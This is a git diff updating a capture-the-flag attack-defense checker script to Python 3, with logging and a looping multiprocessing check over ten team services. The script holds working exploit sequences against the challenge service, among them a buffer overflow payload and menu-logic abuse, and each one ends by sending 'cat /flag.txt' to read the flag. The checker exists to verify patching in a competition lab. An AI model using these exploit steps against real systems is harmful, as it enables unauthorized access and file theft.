diff --git a/checker.py b/checker.py index 1afa257..de888cb 100644 --- a/checker.py +++ b/checker.py @@ -1,9 +1,14 @@ -#! /usr/bin/env python2 +#! /usr/bin/env python3 # from pwn import context, remote from pwn import remote, context -from multiprocessing import pool -context.log_level = "error" +from multiprocessing import Pool +from time import sleep +import logging +import os +context.log_level = logging.ERROR + +INTERVAL = 60 HOST = "192.168.2.20" TOTAL_TEAMS = 10 FORMAT = "SlashRootCTF" @@ -13,7 +18,7 @@ def poc0(host, port): with remote(host, port) as p: p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">") + msg = p.recvuntil(">").decode('utf-8') # print(msg) if "young" in msg: p.sendline("y") @@ -23,11 +28,11 @@ def poc0(host, port): p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') # print flag if FORMAT in flag: return True @@ -48,7 +53,7 @@ def poc1(host, port): p.sendline("3") p.recvuntil(">") p.sendline("0") - if "Who" in p.recvuntil(">"): + if "Who" in p.recvuntil(">").decode('utf-8'): return False p.sendline("y") p.recvuntil(">") @@ -61,7 +66,7 @@ def poc1(host, port): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return True else: @@ -76,17 +81,17 @@ def poc2(host, port): p.sendline("y") p.recvuntil(">") p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">"): + if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return True else: @@ -95,9 +100,50 @@ def poc2(host, port): return False +def poc(host, port): + with remote(host, port) as p: + msg = p.recvuntil(">").decode('utf-8') + if "Who" in msg: + p.sendline("Leo") + msg = p.recvuntil(">").decode('utf-8') + if "Leo" in msg: + p.sendline("Y") + msg = p.recvuntil(">").decode('utf-8') + if "What" in msg: + return True + return False + + +def check(team): + port = (60004 + (team*100)) + r = poc(HOST, port) + r0 = poc0(HOST, port) + r1 = poc1(HOST, port) + r2 = poc2(HOST, port) + return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) + + +def init_logging(logFileName: str, debug: bool = False): + logFormatter = logging.Formatter( + fmt="[%(asctime)s][%(levelname)s] %(message)s", + datefmt='%d-%b-%y %H:%M:%S') + + rootLogger = logging.getLogger("checker") + + consoleHandler = logging.StreamHandler() + consoleHandler.setFormatter(logFormatter) + rootLogger.addHandler(consoleHandler) + + rootLogger.setLevel(logging.DEBUG if debug else logging.INFO) + + return rootLogger + + if __name__ == "__main__": - for i in range(1, TOTAL_TEAMS+1): - r0 = poc0(HOST, (60004 + (i*100))) - r1 = poc1(HOST, (60004 + (i*100))) - r2 = poc2(HOST, (60004 + (i*100))) - print("Team [%s] %s %s %s" % (i, r0, r1, r2)) + checker_logger = init_logging("checker.log") + while True: + with Pool(TOTAL_TEAMS) as p: + results = p.map(check, range(1, TOTAL_TEAMS+1)) + for result in results: + checker_logger.info(result) + sleep(INTERVAL)